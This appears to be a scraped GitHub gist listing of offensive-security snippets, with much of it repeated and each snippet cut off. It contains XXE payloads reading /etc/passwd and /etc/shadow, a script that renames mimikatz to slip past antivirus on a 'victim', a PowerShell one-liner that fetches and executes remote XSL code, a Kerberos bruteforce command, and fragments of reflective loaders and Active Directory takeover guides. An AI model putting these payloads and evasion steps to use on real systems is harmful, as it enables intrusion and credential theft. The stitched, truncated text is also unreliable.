S3cur3Th1sSh1t

## Invoke-winPEAS.ps1
function Invoke-winPEAS
{

    [CmdletBinding()]
    Param (
        [Parameter(Position = 0, Mandatory = $true)]
        [ValidateNotNullorEmpty()]
        [String]
        $Command
        )

## Direct XXE Windows
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>

## PsexecReflective.ps1
function reflectit
{
<#
.SYNOPSIS

This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.

1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.

## mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'

## VLANHopperDTP.py
#!/usr/bin/python

#
# This script is performing DTP Trunk mode detection and VLAN Hopping
# attack automatically, running sniffer afterwards to collect any other
# VLAN available.
#
# This script works best in Unix/Linux environment as the script utilizes
# following applications:
#   - 8021q.ko

## certifried_with_krbrelayup.md

      
              1 file
            
          
              3 forks
            
          
              0 comments
            
          
              1 star
            
          
                S3cur3Th1sSh1t
                / certifried_with_krbrelayup.md
            
            
              Created
              May 19, 2022 13:54
                — forked from tothi/certifried_with_krbrelayup.md
            
              
                Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
              
          
    Certifried combined with KrbRelayUp


Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts
or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user
on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged
domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:

  
## PowerShell.txt
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              2 forks
            
          
              0 comments
            
          
              4 stars
            
          
                S3cur3Th1sSh1t
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              December 13, 2021 12:58
                — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## Program.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
    // CCOB IS THE GOAT

## Workstation-Takeover.md

      
              1 file
            
          
              2 forks
            
          
              0 comments
            
          
              1 star
            
          
                S3cur3Th1sSh1t
                / Workstation-Takeover.md
            
            
              Created
              July 27, 2021 07:44
                — forked from gladiatx0r/Workstation-Takeover.md
            
              
                From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
              
          
    Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
Relaying that machine authentication to LDAPS for configuring RBCD
RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
	function Invoke-winPEAS
	{

	[CmdletBinding()]
	Param (
	[Parameter(Position = 0, Mandatory = $true)]
	[ValidateNotNullorEmpty()]
	[String]
	$Command
	)
	<?xml version="1.0" encoding="ISO-8859-1"?>
	<!DOCTYPE foo [
	<!ELEMENT foo ANY >
	<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

	<?xml version="1.0" encoding="ISO-8859-1"?>
	<!DOCTYPE foo [
	<!ELEMENT foo ANY >
	<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
	function reflectit
	{
	<#
	.SYNOPSIS

	This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
	or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
	please lead the Notes section (GENERAL NOTES) for information on how to use them.

	1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/candycrush
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/candycrush/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
	#!/usr/bin/python

	#
	# This script is performing DTP Trunk mode detection and VLAN Hopping
	# attack automatically, running sniffer afterwards to collect any other
	# VLAN available.
	#
	# This script works best in Unix/Linux environment as the script utilizes
	# following applications:
	# - 8021q.ko
	##############################################################################
	### Powershell Xml/Xsl Assembly "Fetch & Execute"
	### [https://twitter.com/bohops/status/966172175555284992]

	$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

	##############################################################################
	### Powershell VBScript Assembly SCT "Fetch & Execute"
	### [https://twitter.com/bohops/status/965670898379476993]
	using System;
	using System.Collections.Generic;
	using System.Linq;
	using System.Runtime.CompilerServices;
	using System.Net;
	using System.Reflection;
	using System.Runtime.InteropServices;
	namespace Test
	{
	// CCOB IS THE GOAT